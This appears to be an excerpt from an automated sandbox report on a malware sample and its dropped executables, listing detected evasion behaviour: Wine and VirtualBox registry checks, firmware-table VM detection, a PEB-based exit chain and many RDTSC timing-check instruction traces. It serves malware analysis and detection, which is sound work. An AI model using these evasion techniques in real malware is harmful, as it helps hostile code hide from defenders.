Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18D47 second address: B18D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18D4B second address: B18D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18D51 second address: B18D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 jl 00007FC3A8C83B36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18D62 second address: B18D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC3A8C81766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24E2B second address: B24E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3A8C83B43h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC3A8C83B42h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24E56 second address: B24E5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2769D second address: B276A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B276A1 second address: B276A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B276A7 second address: B276AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B276AC second address: B276D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC3A8C81766h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FC3A8C8176Ch 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jc 00007FC3A8C8176Eh 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B276D3 second address: B276F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jbe 00007FC3A8C83B3Eh 0x0000000d jg 00007FC3A8C83B38h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnl 00007FC3A8C83B36h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B278B7 second address: B278BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B278BB second address: B27940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D3784h] 0x00000013 push 00000000h 0x00000015 call 00007FC3A8C83B39h 0x0000001a jp 00007FC3A8C83B44h 0x00000020 push eax 0x00000021 jo 00007FC3A8C83B56h 0x00000027 pushad 0x00000028 jmp 00007FC3A8C83B48h 0x0000002d ja 00007FC3A8C83B36h 0x00000033 popad 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC3A8C83B42h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B27940 second address: B279B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jnc 00007FC3A8C8176Ch 0x00000012 jmp 00007FC3A8C8176Dh 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FC3A8C8176Bh 0x00000021 pop eax 0x00000022 mov edi, dword ptr [ebp+122D3838h] 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D2DAEh], esi 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D1F9Bh], edx 0x00000038 push 00000003h 0x0000003a or dword ptr [ebp+122D2908h], ecx 0x00000040 push 5803B376h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push edx 0x0000004a pop edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B279B2 second address: B279CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B27B65 second address: B27B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39C80 second address: B39C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39C84 second address: B39C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13CBD second address: B13D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3A8C83B36h 0x0000000a jmp 00007FC3A8C83B43h 0x0000000f popad 0x00000010 push edx 0x00000011 jmp 00007FC3A8C83B45h 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3A8C83B46h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13D0C second address: B13D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B46DBF second address: B46DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47346 second address: B4734A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4734A second address: B4736A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3A8C83B46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B474EF second address: B474FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B474FA second address: B47529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FC3A8C83B48h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 jnp 00007FC3A8C83B36h 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47675 second address: B476B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push ecx 0x00000008 jc 00007FC3A8C81766h 0x0000000e jmp 00007FC3A8C81773h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC3A8C81775h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B476B0 second address: B476B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47821 second address: B47829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47829 second address: B4782D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4782D second address: B47843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FC3A8C8178Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47843 second address: B47847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B10 second address: B47B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B16 second address: B47B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FC3A8C83B3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B26 second address: B47B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC3A8C81787h 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B3D second address: B47B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47F68 second address: B47F72 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3A8C81766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47F72 second address: B47F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47F78 second address: B47F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48683 second address: B48689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48689 second address: B4868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4868D second address: B48697 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48697 second address: B4869D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4869D second address: B486A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48E20 second address: B48E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48E24 second address: B48E29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C5A4 second address: B4C5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C5A8 second address: B4C5B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CA28 second address: B4CA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C8176Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CA39 second address: B4CA3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CE13 second address: B4CE20 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DEC1 second address: B4DEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC3A8C83B49h 0x0000000a popad 0x0000000b je 00007FC3A8C83B55h 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1C3CA second address: B1C3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1C3CE second address: B1C3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3A8C83B45h 0x00000013 push esi 0x00000014 jno 00007FC3A8C83B36h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1C3F9 second address: B1C400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55E98 second address: B55EA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3A8C83B36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B12275 second address: B1227A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1227A second address: B1228A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007FC3A8C83B36h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5526C second address: B55288 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC3A8C81777h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B555B7 second address: B555C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC3A8C83B36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B555C6 second address: B555CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B555CA second address: B555E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5578D second address: B55791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55A59 second address: B55A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55A5D second address: B55A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55A61 second address: B55A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B41h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55A78 second address: B55A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C81779h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55A97 second address: B55A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BDB second address: B55BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC3A8C81766h 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55D2B second address: B55D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57ECA second address: B57ED0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57ED0 second address: B57F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3A8C83B42h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 js 00007FC3A8C83B42h 0x00000017 je 00007FC3A8C83B3Ch 0x0000001d je 00007FC3A8C83B36h 0x00000023 pop eax 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FC3A8C83B38h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D17E3h], ebx 0x00000044 call 00007FC3A8C83B39h 0x00000049 push edx 0x0000004a jp 00007FC3A8C83B3Ch 0x00000050 pop edx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC3A8C83B47h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57F59 second address: B57FA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007FC3A8C81778h 0x00000014 jnl 00007FC3A8C8176Ch 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC3A8C81775h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57FA6 second address: B57FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
